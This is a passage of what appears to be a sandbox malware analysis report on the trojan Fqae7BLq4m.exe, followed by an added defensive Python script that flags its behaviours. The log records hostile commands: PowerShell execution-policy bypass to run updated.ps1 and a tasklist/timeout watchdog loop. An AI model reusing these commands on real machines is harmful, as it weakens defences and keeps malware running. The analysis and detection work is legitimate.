Source: Fqae7BLq4m.exe, 00000000.00000003.200307382834.0000000002601000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameV vs Fqae7BLq4m.exe
Source: Fqae7BLq4m.exe | Binary or memory string: OriginalFilenameV vs Fqae7BLq4m.exe
Source: Fqae7BLq4m.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: classification engine | Classification label: mal88.troj.evad.winEXE@101/44@0/1
Source: C:\Users\user\Desktop\Fqae7BLq4m.exe | Code function: 0_2_00407776 wvsprintfW,GetLastError,FormatMessageW,FormatMessageW,FormatMessageW,lstrlenW,lstrlenW,lstrlenW,??2@YAPAXI@Z,lstrcpyW,lstrcpyW,lstrcpyW,??3@YAXPAX@Z,LocalFree
Source: C:\Users\user\Desktop\Fqae7BLq4m.exe | Code function: 0_2_0040118A GetDiskFreeSpaceExW,SendMessageW
Source: C:\Users\user\Desktop\Fqae7BLq4m.exe | Code function: 0_2_004034C1 _wtol,_wtol,SHGetSpecialFolderPathW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,_wtol,CoCreateInstance,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z
Source: C:\Users\user\Desktop\Fqae7BLq4m.exe | Code function: 0_2_00401BDF GetModuleHandleW,FindResourceExA,FindResourceExA,FindResourceExA,SizeofResource,LoadResource,LockResource,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,wsprintfW,LoadLibraryA,GetProcAddress
Source: C:\Users\user\Desktop\Fqae7BLq4m.exe | File created: C:\Users\Public\Bilite
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8972:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8856:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3292:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9028:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8856:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9028:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3292:304:WilStaging_02
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe | Mutant created: \Sessions\1\BaseNamedObjects\2024.12.14
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8972:304:WilStaging_02
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe | File created: C:\Users\user\AppData\Local\Temp\monitor.bat
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /B /c "C:\Users\user\AppData\Local\Temp\\monitor.bat"
Source: Fqae7BLq4m.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\SysWOW64\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'RUNTIMEBROKERS.EXE'
Source: C:\Windows\SysWOW64\findstr.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'RUNTIMEBROKERS.EXE'
Source: C:\Windows\SysWOW64\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'RUNTIMEBROKERS.EXE'
Source: C:\Windows\SysWOW64\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'RUNTIMEBROKERS.EXE'
Source: C:\Windows\SysWOW64\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'RUNTIMEBROKERS.EXE'
Source: C:\Windows\SysWOW64\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'RUNTIMEBROKERS.EXE'
Source: C:\Windows\SysWOW64\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'RUNTIMEBROKERS.EXE'
Source: C:\Windows\SysWOW64\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'RUNTIMEBROKERS.EXE'
Source: C:\Windows\SysWOW64\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'RUNTIMEBROKERS.EXE'
Source: C:\Windows\SysWOW64\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'RUNTIMEBROKERS.EXE'
Source: C:\Windows\SysWOW64\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'RUNTIMEBROKERS.EXE'
Source: C:\Windows\SysWOW64\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'RUNTIMEBROKERS.EXE'
Source: C:\Windows\SysWOW64\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'RUNTIMEBROKERS.EXE'
Source: C:\Windows\SysWOW64\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'RUNTIMEBROKERS.EXE'
Source: C:\Users\user\Desktop\Fqae7BLq4m.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\Fqae7BLq4m.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: Fqae7BLq4m.exe | ReversingLabs: Detection: 42%
Source: Fqae7BLq4m.exe | Virustotal: Detection: 19%
Source: C:\Users\user\Desktop\Fqae7BLq4m.exe | File read: C:\Users\user\Desktop\Fqae7BLq4m.exe
Source: unknown | Process created: C:\Users\user\Desktop\Fqae7BLq4m.exe "C:\Users\user\Desktop\Fqae7BLq4m.exe"
Source: C:\Users\user\Desktop\Fqae7BLq4m.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c start C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /B /c "C:\Users\user\AppData\Local\Temp\\monitor.bat"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq RuntimeBrokers.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "RuntimeBrokers.exe"
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreak
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq RuntimeBrokers.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "RuntimeBrokers.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreak
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq RuntimeBrokers.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "RuntimeBrokers.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreak
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq RuntimeBrokers.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "RuntimeBrokers.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreak
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq RuntimeBrokers.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "RuntimeBrokers.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreak
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq RuntimeBrokers.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "RuntimeBrokers.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreak
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq RuntimeBrokers.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "RuntimeBrokers.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreak
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq RuntimeBrokers.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "RuntimeBrokers.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreak
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq RuntimeBrokers.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "RuntimeBrokers.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreak
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq RuntimeBrokers.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "RuntimeBrokers.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreak
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq RuntimeBrokers.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "RuntimeBrokers.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreak
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq RuntimeBrokers.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "RuntimeBrokers.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreak
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq RuntimeBrokers.exe"
Source: C:\Users\user\Desktop\Fqae7BLq4m.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c start C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /B /c "C:\Users\user\AppData\Local\Temp\\monitor.bat"
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq RuntimeBrokers.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "RuntimeBrokers.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreak
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq RuntimeBrokers.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "RuntimeBrokers.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreak
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq RuntimeBrokers.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "RuntimeBrokers.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreak
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq RuntimeBrokers.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "RuntimeBrokers.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreak
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq RuntimeBrokers.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "RuntimeBrokers.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreak
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq RuntimeBrokers.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "RuntimeBrokers.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreak
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq RuntimeBrokers.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "RuntimeBrokers.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreak
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq RuntimeBrokers.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "RuntimeBrokers.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreak
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "RuntimeBrokers.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "RuntimeBrokers.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreak
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq RuntimeBrokers.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "RuntimeBrokers.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreak
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq RuntimeBrokers.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "RuntimeBrokers.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreak
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq RuntimeBrokers.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "RuntimeBrokers.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreak
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq RuntimeBrokers.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1
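The process-creation rows above describe a small but complete procedure: the dropper launches RuntimeBrokers.exe from C:\Users\Public via cmd /c start, the payload runs monitor.bat (a tasklist | findstr | timeout /t 30 watchdog that polls for its own image name every 30 seconds), and it weakens PowerShell twice (Set-ExecutionPolicy Unrestricted -Scope CurrentUser, then -ExecutionPolicy Bypass -File updated.ps1 from AppData). The following is an added triage script, not part of the Joe Sandbox report and not code from the analysed sample; it parses rows in the "Source: <parent> | Process created: <image> <command line>" shape used on this page and emits the same four findings the Sigma and behaviour signatures raise. The sample rows are constructed from this report's own process tree, and the parser assumes image paths contain no spaces (true for every row here).

```python
"""Triage sandbox "Process created" rows for the behaviours this report shows:
execution from C:\\Users\\Public, a parent living in C:\\Users\\Public,
PowerShell execution-policy tampering, a script run from a user-writable path,
and a tasklist/findstr/timeout watchdog loop. Added example; the sample rows
below are constructed from the report's process tree."""
import json
import re
from collections import Counter

# Constructed sample: a subset of the report's rows, same shape as rendered above.
SAMPLE_ROWS = r"""
Source: unknown | Process created: C:\Users\user\Desktop\Fqae7BLq4m.exe "C:\Users\user\Desktop\Fqae7BLq4m.exe"
Source: C:\Users\user\Desktop\Fqae7BLq4m.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c start C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /B /c "C:\Users\user\AppData\Local\Temp\\monitor.bat"
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq RuntimeBrokers.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "RuntimeBrokers.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreak
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq RuntimeBrokers.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "RuntimeBrokers.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreak
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq RuntimeBrokers.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "RuntimeBrokers.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreak
"""

# Row shape as rendered on this page; image path assumed to contain no spaces.
ROW_RE = re.compile(r'^Source: (?P<parent>.+?) \| Process created: (?P<image>\S+) ?(?P<cmdline>.*)$')
POLICY_RE = re.compile(r'set-executionpolicy\s+(unrestricted|bypass)|-executionpolicy\s+bypass', re.I)
FILE_RE = re.compile(r'-file\s+"?([^"\s]+)', re.I)
TASKLIST_RE = re.compile(r'tasklist\s+/FI\s+"IMAGENAME eq (?P<name>[^"]+)"', re.I)
FINDSTR_RE = re.compile(r'findstr\s+/I\s+"(?P<name>[^"]+)"', re.I)
TIMEOUT_RE = re.compile(r'timeout\s+/t\s+(?P<secs>\d+)', re.I)


def parse_rows(text):
    """Return (parent, image, cmdline) tuples in report order; non-matching lines are skipped."""
    events = []
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if m:
            events.append((m['parent'], m['image'], m['cmdline']))
    return events


def basename(path):
    return path.lower().rsplit('\\', 1)[-1]


def in_public(path):
    return path.lower().startswith('c:\\users\\public\\')


def user_writable(path):
    # Public profile and any AppData subtree: places a standard user can drop files.
    p = path.lower()
    return in_public(p) or '\\appdata\\' in p


def find_watchdog_loops(events):
    """Count completed tasklist -> findstr -> timeout cycles that poll one image name.
    Unrelated rows between the stages do not reset the cycle: the sandbox interleaves
    other children of the same cmd.exe (the PowerShell rows above sit mid-cycle)."""
    cycles = Counter()
    stage, target = 0, None
    for _parent, image, cmdline in events:
        base = basename(image)
        if base == 'tasklist.exe':
            m = TASKLIST_RE.search(cmdline)
            target = m['name'].lower() if m else None
            stage = 1 if target else 0
        elif base == 'findstr.exe' and stage == 1:
            m = FINDSTR_RE.search(cmdline)
            stage = 2 if (m and m['name'].lower() == target) else 0
        elif base == 'timeout.exe' and stage == 2:
            m = TIMEOUT_RE.search(cmdline)
            if m:
                cycles[(target, int(m['secs']))] += 1
            stage = 0
    return {name: {'interval_s': secs, 'cycles': n} for (name, secs), n in cycles.items()}


def analyze(text):
    events = parse_rows(text)
    findings = {'public_folder_exec': [], 'parent_in_public_folder': [],
                'execution_policy_tamper': [], 'script_from_user_writable_path': []}
    for parent, image, cmdline in events:
        if in_public(image):
            findings['public_folder_exec'].append(image)
        if in_public(parent):
            findings['parent_in_public_folder'].append(cmdline)
        if basename(image) == 'powershell.exe':
            # Flag the powershell.exe row only, not the cmd.exe wrapper that carries the same text.
            if POLICY_RE.search(cmdline):
                findings['execution_policy_tamper'].append(cmdline)
            m = FILE_RE.search(cmdline)
            if m and user_writable(m.group(1)):
                findings['script_from_user_writable_path'].append(m.group(1))
    findings['watchdog_loops'] = find_watchdog_loops(events)
    return findings


if __name__ == '__main__':
    print(json.dumps(analyze(SAMPLE_ROWS), indent=2))
```

Running it on the constructed rows reports RuntimeBrokers.exe as the Public-folder executable, three children spawned by a Public-folder parent, two execution-policy changes, updated.ps1 as a script run from AppData, and a 30-second watchdog on runtimebrokers.exe with three completed cycles. Two caveats when applying this to the full report rather than the sample: the row block starting with "Source: unknown" and the later block ending with eight "unknown unknown" rows are the same events listed under two signatures, so deduplicate before counting cycles; and Set-ExecutionPolicy -Scope CurrentUser only writes HKCU, so the -ExecutionPolicy Bypass on the next line is what actually guarantees the script runs, which is why both are worth alerting on separately. Separately, the contoso.com/License, Pester and nuget.org strings in the memory-strings section come from the module manifests that 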